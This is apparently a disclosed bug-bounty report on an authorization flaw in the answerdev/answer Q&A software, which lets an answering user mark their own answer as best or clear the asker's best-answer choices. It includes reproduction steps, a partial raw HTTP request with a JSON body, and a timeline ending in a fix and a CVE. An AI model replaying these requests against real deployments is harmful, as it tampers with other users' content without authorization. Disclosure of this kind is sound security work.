Improper Authorization lead a user can accept his answer as the best answer in answerdev/answer


Reported on

Apr 19th 2023


Login as user A and make a question

Login as User B and answer this

As normal, User A can vote the answer of User B is best answer But with this vuln, User B can call the api

POST HTTP/1.1 Host: Connection: keep-alive Content-Length: 41 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="99", "Google Chrome";v="99" Authorization: e25eda18-de4d-11ed-80b6-0242c0a89004 Content-Type: application/json Accept-Language: en_US sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer:


So the answer of user B is marked as Best Answer

Also, with Post Request {"question_id":"D1C7","answer_id":"0"}

the User B can remove all the best answer that User A has voted

Proof of Concept


Unauthorize alter or remove Vote

We are processing your report and will contact the answerdev/answer team within 24 hours. a month ago
We have contacted a member of the answerdev/answer team and are waiting to hear back a month ago
18 days ago


anyone here?

answerdev/answer maintainer validated this vulnerability 17 days ago
4rth4s has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
answerdev/answer maintainer marked this as fixed in 1.0.9 with commit 51ac1e 17 days ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
answerdev/answer maintainer published this vulnerability 17 days ago
to join this conversation